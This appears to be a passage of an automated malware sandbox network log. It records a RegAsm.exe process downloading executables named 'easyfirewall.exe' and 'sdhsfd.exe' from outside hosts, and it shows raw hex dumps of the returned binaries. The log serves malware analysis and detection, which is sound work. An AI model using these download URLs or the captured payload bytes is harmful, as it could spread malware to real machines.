2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 39 63 44 fc 39 55 42 e9 1f fb a3 f7 47 6e 00 5b 91 ab ef c4 4e aa b1 d2 3c 7e 14 59 e4 e3 32 e1 7b 8c 42 a4 26 cb bc cd de 76 45 ee e9 fc ce cc e8 1d 6c 6b 51 0a ca b9 b2 dc 68 3d c0 43 78 be 7b e6 02 6e ce a9 ac 9e 54 66 80 99 73 82 73 e4 1c 63 91 84 0d 68 dc 0d e6 8e 16 a3 0a 2e 67 7f 34 80 0b 32 f8 f8 bd d7 9f 62 18 67 12 d4 63 16 ac 8a 0f 41 f2 8b 2e 91 ff 57 ee ab 1b c8 57 e6 65 8a 3b 0f 38 2c 9c 7d f6 8c 35 75 90 34 2b 34 8f 0b 54 2f 09 17 a5 a4 cf df cb b2 76 23 02 ff e3 7d 60 0b 8c c5 70 11 df ba 3c f7 ad 2b b7 21 09 95 4d d1 0e 8c 44 12 ce f7 0a 69 30 98 01 1a 90 9e d3 f3 83 6f 8e 82 22 bf ec 8c c2 8f e3 88 40 65 f5 6a a7 5c 26 a8 28 69 4e f3 b3 78 70 4d df 17 f7 8b 63 6b be e3 a0 03 38 6a 09 d2 6e 48 88 11 33 61 26 4b 74 c0 87 33 1e 2c 10 b5 61 Data Ascii: 9cD9UBGn[N<~Y2{B&vElkQh=Cx{nTfssch.g42bgcA.WWe;8,}5u4+4T/v#}`p<+!MDi0o"@ej\&(iNxpMck8jnH3a&Kt3,a
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: cb e1 e5 7b 46 31 f1 5d 84 0a 1a 85 27 5e 55 f9 cf 93 6f 6f 1a f0 f0 81 da 75 60 95 3b e3 f6 58 73 ef 1c 03 64 49 bd ef a9 ff bf a6 f4 98 5d b9 44 76 64 be ca b0 99 33 9a 08 6a c7 4f 41 d9 8e 31 b6 97 82 37 bb be f5 8e 92 ed 91 64 20 5e e9 9e 55 9f 75 73 e8 62 e0 fc 7a b8 b6 95 5b 25 97 06 78 8a c2 67 a8 ef 97 96 48 ab 8f b4 62 97 22 10 a0 e4 d5 50 7b 8e c8 17 3b 44 7f f9 18 38 51 f9 40 73 96 af dd cd 7c 56 d5 80 f2 cb ad 70 be 6c 0e d8 e9 58 4c 2e 73 c1 77 32 9b 23 82 55 07 96 50 ac c1 76 77 26 d8 d6 1e c6 9d 94 50 56 16 d7 1b e7 77 c5 2f b2 4e e5 d2 a0 6a 9c 60 ba 93 99 50 a6 93 ac 39 de 6e 8d 9c b2 c2 7f 7a 74 ee 15 10 e1 3f 68 08 e4 3b 8c 45 f3 cb 06 55 ea 9a 00 af ba 26 57 39 03 13 11 4b 73 60 a8 82 ab b4 bd 61 e2 93 c5 17 57 33 29 5a f2 4d 09 bf d3 Data Ascii: {F1]'^Uoou`;XsdI]Dvd3jOA17d ^Uusbz[%xgHb"P{;D8Q@s\|VplXL.sw2#UPvw&PVw/Nj`P9nzt?h;EU&W9Ks`aW3)ZM
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 02 0a de 83 ee 67 ae e4 3b 19 3d d3 45 04 65 b6 fb 16 0d c5 c9 8c 42 10 1b 50 59 34 6b d3 32 80 8c bf 6a 89 66 45 9e 84 a6 64 ca 23 5f 8c 55 e9 f8 f4 c0 34 ab a6 3e d6 83 73 d8 32 d4 66 08 04 a9 cd a2 f3 29 bc 0c a9 ce 9b 04 97 9c 30 4e 92 ac 47 0d d7 c6 e4 3c e4 47 20 b0 4b 72 48 63 18 6d 85 9b 1e b2 3f da b2 c2 0e db 63 4a 3d b4 3b f5 5b bc bf e2 40 da 85 d5 52 11 8f fd 52 c2 54 7e cc 60 c8 f0 5b 9f 07 cf 71 fb 6c c7 c8 54 29 0c fe 5c c2 a6 97 43 cb 5f ac 00 9b 9a 9a 93 d9 f3 e6 14 48 c9 ce 1b bf c1 5a e8 d7 4e d9 e7 96 67 2c dc 32 b3 00 d1 1a fa 43 46 22 77 98 df 41 26 7b 4b 2b a2 7b 75 8d 4a 6b 35 1a 2a 92 c3 8f 12 f2 0f 6a 27 ee b6 21 b8 0d ac 94 16 e6 66 98 47 58 57 6f e4 03 cc c7 79 72 b6 87 24 16 d7 5b 90 28 dd 3d d4 ae a9 8d a5 da 4d ee f6 3f 66 Data Ascii: g;=EeBPY4k2jfEd#_U4>s2f)0NG<G KrHcm?cJ=;[@RRT~`[qlT)\C_HZNg,2CF"wA&{K+{uJk5*j'!fGXWoyr$[(=M?f
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 95 20 3d 81 93 d0 1b ff ac 30 6c 1f 98 b1 a7 ce 9b a6 49 32 80 aa f2 9c 7b 84 83 14 4d 83 07 97 8c 86 86 3e cd 74 54 98 6d 3d 29 ce 1b 6a f0 47 a4 4d ed cf 07 d5 aa 83 ca d4 13 2d b4 bf 6d e9 9e c1 18 40 10 5a 9b b7 cf a7 6e 50 4d 70 fc 70 4c a3 17 15 c6 bc f5 1c 36 cb 2c 34 72 3d 01 7f df 11 4f 31 6d e2 b2 ba 21 cf 42 d7 89 80 c9 59 89 42 29 55 12 50 fb 3b 2f 27 11 20 9a ef da b4 b4 84 08 f2 e0 3a 46 d7 70 cb 59 05 f0 41 8c 1d 76 37 8c 04 46 24 e8 10 99 15 4a 0b a9 9d 1e 94 6c 40 63 f6 42 e3 3a 96 8b d6 54 32 65 f9 42 ed 9c 4d 15 16 ed db a8 25 41 a1 f8 a6 d8 9c dc cd 84 77 57 2b d4 60 f7 84 f0 ae 86 c1 68 06 44 4f f3 c4 db 67 39 95 65 2a f5 13 82 da 8b 02 e3 f9 0d cd 3e b5 42 65 f0 40 0f 6e eb c6 59 6f 7a b9 9d 81 3a d5 65 e2 4d e3 42 59 6f e5 9b c9 af Data Ascii: =0lI2{M>tTm=)jGM-m@ZnPMppL6,4r=O1m!BYB)UP;/' :FpYAv7F$Jl@cB:T2eBM%AwW+`hDOg9e*>Be@nYoz:eMBYo
2024-09-21 12:48:10 UTC	8000	IN	Data Raw: 6a 5f a6 25 2a 96 02 47 8c ed 89 de 3c 72 ba 69 63 3e 89 9c 33 85 90 22 ae 3e 60 f6 2b a3 53 5a d0 c5 fa d1 f0 cd ac f9 5e 88 71 34 ed 98 55 2a 0a 2c a9 1b e3 86 38 8f 9a 9d fe 83 2b ea 4e ef 74 6d 9e ad 6a 56 56 9d a3 bd 9e 1d bd 6b 0e 56 69 df b3 79 72 ef 08 83 af 0e 4d b0 1e bc 7a 1c a3 6b 8b 48 9c 87 7b 38 c4 91 d4 d7 f8 39 da c8 1b b0 ca 8d 12 a1 e8 47 79 1e 50 83 3d f5 2a c2 a8 f8 92 44 6e 03 b1 3c ff a8 a5 2f 81 23 7a 5a d0 10 61 80 81 a4 02 11 62 db 15 3c 18 30 e7 2a 62 70 29 88 32 eb 08 0a d3 4e 2c f7 83 f8 e2 ff 7f a2 d2 ad bd b7 13 a5 8d 99 00 b3 e3 ed a2 b2 2f ac 59 1e a1 61 7c 01 71 de 1d 8c ad 5a 86 60 0b ef 6b 73 68 77 8c 41 68 6e 08 2d 65 04 32 bd db 16 52 8c a9 40 bb 49 97 35 3a ce 5e e7 69 e6 da c1 4c fd ea 71 4b 4c 78 c8 1c f2 7b ee bc Data Ascii: j_%G<ric>3">`+SZ^q4U,8+NtmjVVkViyrMzkH{89GyP=Dn</#zZab<0bp)2N,/Ya\|qZ`kshwAhn-e2R@I5:^iLqKLx{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49730	54.231.236.201	443	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:11 UTC	1361	OUT	GET /bbfbfb0f-4597-4ff3-b025-124f61baf271/downloads/7f30c6a5-e68f-46b2-82dc-be29f7fa498f/easyfirewall.exe?response-content-disposition=attachment%3B%20filename%3D%22easyfirewall.exe%22&AWSAccessKeyId=ASIA6KOSE3BNALNDSNXI&Signature=7Oy%2Bjzmz%2FlXC%2FL1QASQlZvKc%2Bl8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEFUaCXVzLWVhc3QtMSJGMEQCIDE7ySbs3yUKutqnoMVZe2lBMy%2FzLUXK7oA9sVz3qh3fAiB7uhzCaJ9QAf8KACE%2BI3nJiDzFAW0ja%2FG7sHqOwjkBVyqwAgiO%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMsG28MyjVkhRoivDZKoQC2Nc%2FjnX7Tbhrr0Gh8ipoFpgeJ%2BpNqndZT4i%2BOmSK6LFExTbeLlFeC3aOopynxOWTtXGkMfcvWjgryJmsRfTly0%2F%2F3B3Vx63gKJ4o3QZZExWB5ecbpWMs%2Bc48sEJ8nIrd4YZibjmyiqvqkjxZkJTMVKCLLCM7ZO2hRDaB22a7lR1E7CpB7AAoyh%2FiTlDsxWuHKuDLvqMqx8UNPVEvpzj3sV2M4kl9sn7TBWI5yWl%2FZymPomH2fXbA6yTcmqlPq%2FrDycduU0I01uI8v91zRz7QDYqWlTquKfBYFo%2FoWPY7toSWKATL7%2FwXiHqODNH93aSs63LBq39Xw41mTOonKYbRosm22PQwjf66twY6ngHaj1zb%2FhGT4dlAnMdSXHAGlvyvWd50O5Ui%2FXnBPKGu108w8WdcK%2BdyQpVVrnszsaYmewsJVta0GbBLEkWzuG6hpH2CVZ%2FFLyb67eupBy2hlY65kjfqM4In7bmglhQvy [TRUNCATED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Cache-Control: no-cache Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2024-09-21 12:48:11 UTC	549	IN	HTTP/1.1 200 OK x-amz-id-2: /iNcgadtHKwlHDzfy3aqr/LuVHHG5coArFw6ESXXz70mWf8u8q7LkHsLtOhHLty37oR3uDTq4NU= x-amz-request-id: 4H6ERT31HY8ZP46C Date: Sat, 21 Sep 2024 12:48:12 GMT Last-Modified: Fri, 20 Sep 2024 17:25:15 GMT ETag: "4eacb750002490284888e5adceae7ca7-3" x-amz-server-side-encryption: AES256 x-amz-version-id: IVhJvkxy9Iqiznh75XtLIn3UyKmrbEmY Content-Disposition: attachment; filename="easyfirewall.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Server: AmazonS3 Content-Length: 22487040 Connection: close
2024-09-21 12:48:11 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 f6 68 00 00 1c 57 01 00 2c 09 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 c0 60 01 00 04 00 00 85 2a 57 01 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$hW,@`*W`
2024-09-21 12:48:11 UTC	475	IN	Data Raw: 7f 93 a0 00 00 00 f3 44 0f 7f 9b b0 00 00 00 b8 00 00 00 00 66 4c 0f 6e f8 48 83 c4 10 5d c3 cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 2c 01 00 00 e8 c8 f1 ff ff 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 73 6f 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 49 3b 66 10 0f 86 30 01 00 00 55 48 89 e5 f2 0f 10 05 1a 9d f8 00 f2 0f 11 05 22 53 59 01 48 8b 05 fb f1 6d 00 83 3d 04 58 59 01 00 74 13 e8 8d 8e 06 00 49 89 03 48 8b 0d 3b a5 50 01 49 89 4b 08 48 89 05 30 a5 50 01 48 8b 05 e1 f1 6d 00 83 3d da 57 59 01 00 74 13 e8 63 8e 06 00 49 89 03 48 8b 0d 19 a5 50 01 49 89 4b 08 48 89 05 0e a5 50 01 48 8b 05 c7 f1 6d 00 83 3d b0 57 59 01 00 74 13 e8 39 8e 06 00 49 89 03 48 8b 0d f7 a4 50 01 49 89 4b 08 48 89 05 ec a4 50 01 48 8b 05 Data Ascii: DfLnH]I;fvUHH,H]HD$H\$soHD$H\$I;f0UH"SYHm=XYtIH;PIKH0PHm=WYtcIHPIKHPHm=WYt9IHPIKHPH
2024-09-21 12:48:11 UTC	16384	IN	Data Raw: 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 d3 6d 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 02 00 00 00 e8 88 8b 06 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 93 6d 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 10 00 00 00 e8 48 8b 06 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 53 6d 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 55 48 89 e5 48 83 ec 18 48 83 c2 08 48 8b 0a e8 0c 8b 06 00 48 83 c4 18 5d c3 cc cc cc cc cc cc 49 3b 66 10 76 1d 55 48 89 e5 48 83 ec 18 48 8b 10 48 8b 48 08 48 89 d0 e8 a3 60 00 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 ee 6c 06 00 48 8b 44 24 08 48 8b 5c Data Ascii: ]HD$H\$mHD$H\$I;fvUHHH]HD$H\$mHD$H\$I;fvUHHHH]HD$H\$SmHD$H\$UHHHHH]I;fvUHHHHHH`H]HD$H\$lHD$H\
2024-09-21 12:48:11 UTC	1024	IN	Data Raw: 48 89 4c 24 18 e8 db 33 03 00 48 8d 05 ff ed a7 00 bb 08 00 00 00 e8 4a 3c 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 bb 3a 03 00 e8 f6 35 03 00 e8 11 34 03 00 48 8b 44 24 30 48 8b 88 c0 00 00 00 48 89 4c 24 18 e8 9b 33 03 00 48 8d 05 c7 ed a7 00 bb 08 00 00 00 e8 0a 3c 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b 3a 03 00 e8 b6 35 03 00 e8 d1 33 03 00 48 8b 44 24 30 48 8b 88 c8 00 00 00 48 89 4c 24 18 e8 5b 33 03 00 48 8d 05 8f ed a7 00 bb 08 00 00 00 e8 ca 3b 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 3b 3a 03 00 e8 76 35 03 00 e8 91 33 03 00 48 8b 44 24 30 48 8b 88 d0 00 00 00 48 89 4c 24 18 e8 1b 33 03 00 48 8d 05 57 ed a7 00 bb 08 00 00 00 e8 8a 3b 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 fb 39 03 00 e8 36 35 03 00 e8 51 33 03 00 48 8b 44 24 30 48 8b 88 d8 00 00 Data Ascii: HL$3HJ<HD$D:54HD$0HHL$3H<HD$D{:53HD$0HHL$[3H;HD$D;:v53HD$0HHL$3HW;HD$D965Q3HD$0H
2024-09-21 12:48:11 UTC	16384	IN	Data Raw: 0f 1f 44 00 00 45 38 d1 74 c1 eb 8b 49 29 d8 49 8d 48 ff 48 89 ce 48 f7 d9 48 c1 f9 3f 48 8d 7b 01 48 21 cf 48 8d 04 3a 48 89 f3 48 83 c4 10 5d c3 48 89 c8 48 89 d9 e8 a9 4c 06 00 48 8d 05 61 76 a9 00 bb 16 00 00 00 e8 f8 14 03 00 90 48 89 44 24 08 48 89 5c 24 10 e8 88 29 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 f9 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 8d 64 24 80 4d 3b 66 10 0f 86 5f 03 00 00 55 48 89 e5 48 81 ec f8 00 00 00 48 89 84 24 08 01 00 00 48 8b 08 48 85 c9 75 0e bb 09 00 00 00 48 8d 0d ae f4 a7 00 eb 18 48 89 c8 0f 1f 44 00 00 e8 bb 91 05 00 48 89 c1 48 8b 84 24 08 01 00 00 48 89 4c 24 78 48 89 5c 24 50 48 8b 50 10 48 89 d0 e8 9a 91 05 00 48 8b 8c 24 08 01 00 00 48 8b 51 08 48 85 d2 0f 84 b9 02 00 Data Ascii: DE8tI)IHHHH?H{H!H:HH]HHLHavHD$H\$)HD$H\$Ld$M;f_UHHH$HHuHHDHH$HL$xH\$PHPHH$HQH
2024-09-21 12:48:11 UTC	1024	IN	Data Raw: ce 01 f0 48 0f b1 33 40 0f 94 c6 40 84 f6 75 6b 48 8b 74 24 20 31 c0 48 89 44 24 18 48 39 c8 7c 32 48 8d 79 01 48 39 f8 7d 69 48 8d 05 1c be af 00 48 89 04 24 e8 8b e8 05 00 45 0f 57 ff 4c 8b 35 c0 cf 58 01 65 4d 8b 36 4d 8b 36 48 8b 44 24 18 eb 88 c7 04 24 1e 00 00 00 e8 06 04 06 00 45 0f 57 ff 4c 8b 35 9b cf 58 01 65 4d 8b 36 4d 8b 36 48 8b 44 24 18 e9 60 ff ff ff 48 8d 44 24 38 0f 1f 44 00 00 e8 db 4d 02 00 48 83 c4 58 5d c3 48 89 f8 48 8b 7a 30 49 89 f0 48 83 e6 fe 48 89 b7 38 02 00 00 48 8b 72 30 48 83 ce 01 48 89 c7 4c 89 c0 f0 48 0f b1 33 40 0f 94 c6 40 84 f6 75 11 48 8b 33 0f ba e6 00 72 c6 48 89 f8 e9 09 ff ff ff 41 0f ba e0 00 73 22 48 c7 c0 ff ff ff ff 0f 1f 44 00 00 e8 9b 9b 02 00 48 8b 4c 24 10 48 8b 54 24 28 48 8b 5c 24 30 31 ff 48 89 f8 e9 Data Ascii: H3@@ukHt$ 1HD$H9\|2HyH9}iHH$EWL5XeM6M6HD$$EWL5XeM6M6HD$`HD$8DMHX]HHz0IHH8Hr0HHLH3@@uH3rHAs"HDHL$HT$(H\$01H
2024-09-21 12:48:12 UTC	16384	IN	Data Raw: 8b 36 4d 8b 36 48 8b 4c 24 18 48 8b 5c 24 38 48 8b 13 48 85 d2 74 b6 eb 9e 48 8d 05 c5 b3 a8 00 bb 13 00 00 00 e8 1b d1 02 00 90 48 89 44 24 08 e8 b0 e5 05 00 48 8b 44 24 08 e9 c6 fe ff ff cc cc cc cc cc cc 55 48 89 e5 48 83 ec 38 49 8b 4e 30 48 89 4c 24 20 48 8b 4c 24 20 48 89 c2 31 c0 f0 48 0f b1 0a 0f 94 c1 84 c9 74 6b 4c 89 74 24 30 48 85 db 7d 2d 49 8b 4e 30 c6 81 e5 00 00 00 01 48 8b 0d a5 56 6d 00 48 83 39 00 0f 85 16 02 00 00 48 c7 c0 ff ff ff ff e8 e7 97 02 00 e9 bc 01 00 00 48 89 54 24 28 48 89 5c 24 50 e8 73 21 06 00 45 0f 57 ff 4c 8b 35 48 cb 58 01 65 4d 8b 36 4d 8b 36 48 8b 04 24 48 8b 5c 24 50 48 01 d8 48 89 44 24 18 eb 28 48 83 3a 01 75 0b b8 01 00 00 00 48 83 c4 38 5d c3 48 8d 05 c2 a4 aa 00 bb 1e 00 00 00 e8 4c d0 02 00 48 89 d0 48 89 cb Data Ascii: 6M6HL$H\$8HHtHHD$HD$UHH8IN0HL$ HL$ H1HtkLt$0H}-IN0HVmH9HHT$(H\$Ps!EWL5HXeM6M6H$H\$PHHD$(H:uH8]HLHH
2024-09-21 12:48:12 UTC	1024	IN	Data Raw: 08 48 89 7c 24 38 48 83 fa ff 0f 84 2b 01 00 00 44 0f b6 53 08 41 f6 c2 08 0f 85 1c 01 00 00 4c 89 44 24 30 0f ba e1 02 73 07 b9 01 00 00 00 eb 43 48 8b 4e 30 48 8b 51 18 48 8b 0a 4c 89 e0 48 89 c3 ff d1 48 8b 54 24 20 48 8b 5c 24 50 48 8b 74 24 40 48 8b 7c 24 38 4c 8b 44 24 30 44 0f b6 4c 24 1f 4c 8b 64 24 48 4c 8b 7c 24 58 89 c1 48 8b 44 24 70 84 c9 75 37 0f b6 48 4a ff c9 49 89 d2 48 d3 ea 47 0f b6 1c 38 41 83 e3 01 80 f9 40 4d 19 ed 49 21 d5 4d 39 eb 0f 84 9f 00 00 00 4c 89 d2 48 8b 7c 24 28 4d 89 fa e9 db fe ff ff 48 8b 56 48 48 8b 0a 8b 7b 0c 4c 89 e0 48 89 fb ff d1 48 8b 4c 24 70 0f b6 71 4a 48 89 ca 89 f1 bf 01 00 00 00 48 d3 e7 48 8d 4f ff 48 21 c8 48 8b 4c 24 20 66 90 48 39 c1 74 25 48 89 d0 48 89 ca 48 8b 5c 24 50 48 8b 74 24 40 48 8b 7c 24 28 Data Ascii: H\|$8H+DSALD$0sCHN0HQHLHHT$ H\$PHt$@H\|$8LD$0DL$Ld$HL\|$XHD$pu7HJIHG8A@MI!M9LH\|$(MHVHH{LHHL$pqJHHHOH!HL$ fH9t%HHH\$PHt$@H\|$(
2024-09-21 12:48:12 UTC	16384	IN	Data Raw: 0f 1f 44 00 00 e8 5b c1 05 00 49 89 13 48 8b 50 08 49 89 53 08 48 8b 50 10 49 89 53 10 44 0f 11 38 48 c7 40 10 00 00 00 00 0f b6 59 09 48 8b 51 10 48 8b 44 24 28 48 89 d1 e8 a7 e5 ff ff 48 85 db 74 2a 48 8b 4c 24 30 48 8b 51 28 84 02 83 3d 60 8a 58 01 00 74 10 e8 e9 c0 05 00 49 89 1b 48 8b 72 10 49 89 73 08 48 89 5a 10 eb 05 48 8b 4c 24 30 0f b6 51 08 f6 c2 04 75 16 48 8d 05 99 c1 a8 00 bb 15 00 00 00 e8 99 8d 02 00 48 8b 4c 24 30 0f b6 41 08 83 e0 fb 88 41 08 48 83 c4 18 5d c3 48 ff c1 90 48 39 f1 0f 87 f4 fe ff ff 0f b7 78 52 48 0f af f9 48 01 d7 eb 10 44 0f b7 40 52 4e 8d 04 07 4d 8d 40 f8 49 8b 38 48 85 ff 74 d1 45 31 c0 eb 08 42 c6 04 07 00 49 ff c0 49 83 f8 08 72 f2 66 90 eb d4 44 0f b7 40 52 4d 8d 04 38 4d 8d 40 f8 49 8b 38 48 85 ff 0f 84 5b fe ff Data Ascii: D[IHPISHPISD8H@YHQHD$(HHt*HL$0HQ(=`XtIHrIsHZHL$0QuHHL$0AAH]HH9xRHHD@RNM@I8HtE1BIIrfD@RM8M@I8H[
2024-09-21 12:48:12 UTC	1024	IN	Data Raw: cc cc cc cc cc 55 48 89 e5 48 83 ec 20 48 39 d9 74 58 80 3d 9c 4a 58 01 00 74 38 48 8b 50 08 48 85 d2 74 2f 48 89 44 24 30 48 89 5c 24 38 48 89 4c 24 40 48 89 c7 48 89 d8 48 89 cb 48 89 d1 e8 e1 14 00 00 48 8b 44 24 30 48 8b 4c 24 40 48 8b 5c 24 38 48 8b 10 48 89 d8 48 89 cb 48 89 d1 e8 61 8e 05 00 48 83 c4 20 5d c3 48 83 c4 20 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 48 83 ec 20 48 8b 48 08 48 89 c7 48 89 d8 31 db e8 87 14 00 00 48 83 c4 20 5d c3 cc 55 48 89 e5 48 83 ec 20 48 8b 50 08 48 89 c7 48 89 d8 48 89 cb 48 89 d1 e8 63 14 00 00 48 83 c4 20 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 48 89 e5 48 83 ec 20 48 89 74 24 50 80 3d bc 49 58 01 00 74 40 48 85 c0 74 Data Ascii: UHH H9tX=JXt8HPHt/HD$0H\$8HL$@HHHHHD$0HL$@H\$8HHHHaH ]H ]UHH HHHH1H ]UHH HPHHHHcH ]UHH Ht$P=IXt@Ht

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.9	49731	162.241.61.218	443	7504	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 12:48:11 UTC	197	OUT	GET /sdhsfd.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Host: nerv.com.pe Cache-Control: no-cache
2024-09-21 12:48:11 UTC	249	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 12:48:11 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Fri, 20 Sep 2024 21:15:05 GMT Accept-Ranges: bytes Content-Length: 222112 Content-Type: application/x-msdownload
2024-09-21 12:48:11 UTC	7943	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 54 e5 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 0a 03 00 00 08 00 00 00 00 00 00 ee 28 03 00 00 20 00 00 00 40 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 03 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTf( @@ `
2024-09-21 12:48:11 UTC	8000	IN	Data Raw: 62 ef fb e9 33 23 45 c9 f5 b2 08 e1 66 c6 e0 60 5a 48 e1 b1 79 f5 3c 9c ba 3c da 39 5f 75 05 af bb a2 dc ae 15 19 b6 d4 d0 b8 48 e3 70 2d c1 cc 07 c1 aa 91 35 bb 71 08 fc 31 84 ac c8 0f 63 25 be e6 90 14 44 98 c3 ed 9d 36 15 70 94 1b a6 2c 85 41 ba 4b c3 9d 5f d2 83 a6 0c 99 eb de f1 da 6d 29 ec 62 1b fe 69 e6 97 ab 52 6a 4b 3a 0c 8e d0 e2 be d1 54 39 13 bd 8b 85 a3 d9 1b 36 aa 96 71 be fb 65 c0 df 52 61 73 4b e6 d6 9e ba 16 7f 94 22 1b a4 f0 43 8b 0b b3 ea f4 30 7c 1a 99 7e 7e eb 87 91 f3 c0 ec ff 9d 19 10 b5 fd c3 f7 f4 f4 aa 02 f2 95 78 d3 51 ef 49 6d a3 46 11 b9 62 8a d1 06 7d f5 31 82 3d 58 f7 09 b6 38 47 e5 da 80 ca 28 3b cd 8d 42 65 84 6f 4e 8f b8 b7 8a e1 15 cf 94 d1 e1 84 23 67 8b 5b 39 af 43 d3 fc e8 9a ed 21 01 15 c8 f4 62 42 99 64 38 69 80 10 Data Ascii: b3#Ef`ZHy<<9_uHp-5q1c%D6p,AK_m)biRjK:T96qeRasK"C0\|~~xQImFb}1=X8G(;BeoN#g[9C!bBd8i
2024-09-21 12:48:11 UTC	8000	IN	Data Raw: 89 19 d5 7c da 9e ff 76 53 c3 2f 3a 35 47 2b b4 d2 8c 9f cd c7 f6 f9 17 20 a6 ad 03 c4 a2 10 c2 8c ad 70 05 c5 a8 b4 7d 30 9b 8d 36 28 88 3f 1c 95 fb f6 9e 67 fc 11 18 e7 65 55 d3 a5 53 03 f7 40 5f 6e 55 50 cc 4e 40 4d d8 f8 f3 e2 35 b8 44 6f d0 1a 46 2a dd d0 d2 c1 5e f5 65 67 0c 88 5a 58 f7 a8 68 98 20 cb c9 e2 ca a6 75 70 3d 80 b3 6e 84 58 a2 23 46 e0 26 7c 84 86 f2 b0 b7 15 4c 5c eb 40 24 1e 96 dc 51 5e 96 1d 63 f4 84 d4 19 5b 19 bb 46 ec 49 ac 48 c9 19 62 bf d6 9c 13 9d 5d 94 7d 94 7e d0 e0 15 a7 3a 68 24 bb 95 bf df 25 dc 7b f8 2e 3a 4a 0b 9b 38 ec b2 a7 62 ab d0 47 12 2b 41 79 7d 57 96 73 af 23 20 8d b3 18 49 ab 0f 5a e2 bf 97 65 3b d9 f5 a0 ed e6 cb 59 c5 43 ed aa 6e f3 81 5f c9 55 dc 88 9c ca 59 b0 4a 7d 9c 67 22 61 cb d6 b9 18 ef c4 84 f5 f6 e3 Data Ascii: \|vS/:5G+ p}06(?geUS@_nUPN@M5DoF*^egZXh up=nX#F&\|L\@$Q^c[FIHb]}~:h$%{.:J8bG+Ay}Ws# IZe;YCn_UYJ}g"a
